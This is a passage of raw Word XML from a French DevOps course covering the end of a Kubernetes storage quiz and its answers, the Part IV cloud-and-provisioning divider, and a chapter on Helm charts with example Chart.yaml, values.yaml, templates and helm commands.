          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base critique : volume persistant avec rétention, sauvegarde externalisée et restauration testée, ou service managé.</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 volume survit à la suppression du pod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emptyDir</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Un PVC</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 xml:space="preserve">Un montage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tmpfs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Aucun</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ReadWriteOnce</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 seul pod peut écrire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Un seul nœud peut monter en écriture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Lecture seule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Écriture unique</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Quel objet donne une identité stable aux réplicas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Deployment</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ReplicaSet</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StatefulSet</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DaemonSet</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Pourquoi une réplication ne remplace-t-elle pas une sauvegarde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Elle est trop lente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Une erreur logique se réplique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Elle coûte trop cher</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Elle n'est pas fiable</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>reclaimPolicy: Retain</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Supprime le volume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Conserve le volume après suppression du PVC</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Réutilise le volume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Chiffre le volume</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Le volume persistant est indépendant du cycle de vie du pod.</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Le volume est monté en écriture par un seul nœud à la fois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Les pods sont nommés et ordonnés, avec un volume par pod.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Une suppression accidentelle est reproduite instantanément sur les réplicas.</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Les données restent, mais nécessitent un nettoyage manuel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId107"/>
          <w:footerReference w:type="default" r:id="rId108"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE IV</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Cloud, provisionnement et configuration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Modèles de service, AWS, Azure, Google Cloud, serverless, Terraform, Pulumi, Ansible, Chef et Puppet.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46. Helm et service mesh · 47. Modèles de cloud et architecture de référence · 48. AWS : services essentiels et bonnes pratiques · 49. Azure et Google Cloud : équivalents et choix · 50. Serverless : fonctions et événements · 51. Terraform : décrire l'infrastructure · 52. Pulumi : l'infrastructure en langage de programmation · 53. Ansible : configuration et idempotence · 54. Gestion de configuration : Chef, Puppet et stratégies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>69. Helm et service mesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Paramétrer des déploiements complexes et ajouter une couche de communication entre services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Avancé · Prérequis : chapitre 68</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Structurer un chart Helm lisible.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Paramétrer sans multiplier les fichiers de valeurs.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Gérer les versions et les retours arrière.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Situer le service mesh et ses cas d'usage réels.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Éviter la complexité prématurée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>69.1 Pourquoi un gestionnaire de paquets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une application Kubernetes se compose d'un déploiement, d'un service, d'un ingress, d'une configuration et parfois de tâches planifiées. Helm regroupe ces objets en un paquet versionné et paramétrable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.253 — Cinq notions Helm</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49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Élément Helm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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319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Équivalent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Paquet d'objets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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values.yaml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Valeurs par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objet paramétré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifeste avec variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="249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Release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Instance installée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Un déploiement nommé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2496"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépôt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Catalogue de charts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Registre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une arborescence de chart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mon-service/</w:t>
        <w:br/>
        <w:t>├── Chart.yaml</w:t>
        <w:br/>
        <w:t>├── values.yaml</w:t>
        <w:br/>
        <w:t>├── values.production.yaml</w:t>
        <w:br/>
        <w:t>└── templates/</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── deployment.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── service.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── ingress.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── configmap.yaml</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ├── _helpers.tpl</w:t>
        <w:br/>
        <w:t xml:space="preserve">    └── NOTES.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un descripteur de chart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Chart.yaml</w:t>
        <w:br/>
        <w:t>apiVersion: v2</w:t>
        <w:br/>
        <w:t>name: mon-service</w:t>
        <w:br/>
        <w:t>description: API de démonstration</w:t>
        <w:br/>
        <w:t>type: application</w:t>
        <w:br/>
        <w:t>version: 1.4.2</w:t>
        <w:br/>
        <w:t>appVersion: "1.4.2"</w:t>
        <w:br/>
        <w:t>dependencies:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: postgresql</w:t>
        <w:br/>
        <w:t xml:space="preserve">    version: 15.5.x</w:t>
        <w:br/>
        <w:t xml:space="preserve">    repository: https://charts.bitnami.com/bitnami</w:t>
        <w:br/>
        <w:t xml:space="preserve">    condition: postgresql.enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>69.2 Paramétrer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un chart utile expose peu de valeurs, avec des défauts sûrs. Multiplier les paramètres rend le chart impossible à maintenir ; en figer trop le rend inutilisable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Des valeurs lisibles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values.yaml</w:t>
        <w:br/>
        <w:t>replicaCount: 2</w:t>
        <w:br/>
        <w:br/>
        <w:t>image:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  repository: registry.exemple.fr/equipe/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tag: "1.4.2"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pullPolicy: IfNotPresent</w:t>
        <w:br/>
        <w:br/>
        <w:t>resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: 100m</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: 128Mi</w:t>
        <w:br/>
        <w:t xml:space="preserve">  limits:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    cpu: 500m</w:t>
        <w:br/>
        <w:t xml:space="preserve">    memory: 256Mi</w:t>
        <w:br/>
        <w:br/>
        <w:t>ingress:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  enabled: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  className: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  host: api.exemple.fr</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tls: true</w:t>
        <w:br/>
        <w:br/>
        <w:t>config:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  logLevel: info</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cacheTtl: 300</w:t>
        <w:br/>
        <w:br/>
        <w:t>postgresql:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  enabled: true</w:t>
        <w:br/>
        <w:t xml:space="preserve">  auth:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    database: app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un template paramétré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templates/deployment.yaml</w:t>
        <w:br/>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: {{ include "mon-service.fullname" . }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {{- include "mon-service.labels" . | nindent 4 }}</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: {{ .Values.replicaCount }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      {{- include "mon-service.selectorLabels" . | nindent 6 }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      labels:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        {{- include "mon-service.selectorLabels" . | nindent 8 }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - name: {{ .Chart.Name }}</w:t>
        <w:br/>
        <w:t xml:space="preserve">          image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">          ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - containerPort: 3000</w:t>
        <w:br/>
        <w:t xml:space="preserve">          resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            {{- toYaml .Values.resources | nindent 12 }}</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NE DUPLIQUEZ PAS LA LOGIQUE DANS LES TEMPLATES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Les fonctions </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_helpers.tpl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> centralisent les noms, les étiquettes et les annotations. Un chart où chaque fichier recalcule le nom complet devient incohérent au premier renommage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux helpers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_helpers.tpl</w:t>
        <w:br/>
        <w:t>{{- define "mon-service.fullname" -}}</w:t>
        <w:br/>
        <w:t>{{- printf "%s-%s" .Release.Name .Chart.Name | trunc 63 | trimSuffix "-" -}}</w:t>
        <w:br/>
        <w:t>{{- end -}}</w:t>
        <w:br/>
        <w:br/>
        <w:t>{{- define "mon-service.selectorLabels" -}}</w:t>
        <w:br/>
        <w:t>app.kubernetes.io/name: {{ .Chart.Name }}</w:t>
        <w:br/>
        <w:t>app.kubernetes.io/instance: {{ .Release.Name }}</w:t>
        <w:br/>
        <w:t>{{- end -}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>69.3 Installer, mettre à jour, revenir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Helm conserve l'historique des releases. Une mise à jour ratée se corrige par un retour arrière en une commande, ce qui est un argument décisif en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Neuf commandes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Vérifier avant d'installer</w:t>
        <w:br/>
        <w:t>helm lint mon-service/</w:t>
        <w:br/>
        <w:t>helm template mon-service ./mon-service -f values.production.yaml | less</w:t>
        <w:br/>
        <w:br/>
        <w:t># Installer et mettre à jour</w:t>
        <w:br/>
        <w:t>helm install api ./mon-service -n production -f values.production.yaml</w:t>
        <w:br/>
        <w:t>helm upgrade api ./mon-service -n production -f values.production.yaml</w:t>
        <w:br/>
